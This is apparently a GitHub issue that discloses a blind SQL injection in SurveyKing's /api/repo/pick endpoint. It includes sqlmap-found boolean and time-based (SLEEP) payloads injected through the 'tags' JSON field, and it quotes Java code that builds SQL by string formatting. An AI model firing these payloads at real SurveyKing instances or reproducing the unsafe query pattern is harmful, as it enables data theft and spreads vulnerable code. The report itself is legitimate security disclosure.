SurveyKing icon indicating copy to clipboard operation
SurveyKing copied to clipboard

Blind SQL Injection

Open lcxing opened this issue 2 years ago • 0 comments

there is a blind sql injection in api /api/repo/pick. Use sqlmap can find it.

sqlmap identified the following injection point(s) with a total of 21258 HTTP(s) requests:

Parameter: JSON #4* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: [{"id":"Axd_JDOJc_","repoId":"1585481117291630593","types":["Radio"],"tags":["简单') AND 7642=7642 AND ('TlAO'='TlAO"],"questionsNum":2,"examScore":1}]

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [{"id":"Axd_JDOJc_","repoId":"1585481117291630593","types":["Radio"],"tags":["简单') AND (SELECT 8522 FROM (SELECT(SLEEP(5)))cRCX) AND ('AezM'='AezM"],"questionsNum":2,"examScore":1}]

the code is cn.surveyking.server.impl.ProjectServiceImpl#listProject

cPage<Project> page = pageByQuery(query, Wrappers.<Project>lambdaQuery() .like(isNotBlank(query.getName()), Project::getName, query.getName()) .eq(isNotBlank(query.getParentId()), Project::getParentId, query.getParentId()) // 父id为空或者为 0 表示一级目录 .and(isBlank(query.getParentId()), c -> c.isNull(Project::getParentId).or().eq(Project::getParentId, "0")) .eq(query.getMode() != null, Project::getMode, query.getMode()) .exists(String.format( "SELECT 1 FROM t_project_partner t WHERE t.type in (1, 2) AND t.user_id = '%s' AND t.project_id =", SecurityContextUtils.getUserId())) .orderByAsc(Project::getPriority, Project::getCreateAt)); PaginationResponse<ProjectView> result = new PaginationResponse<>(page.getTotal(),

lcxing avatar Oct 28 '22 03:10 lcxing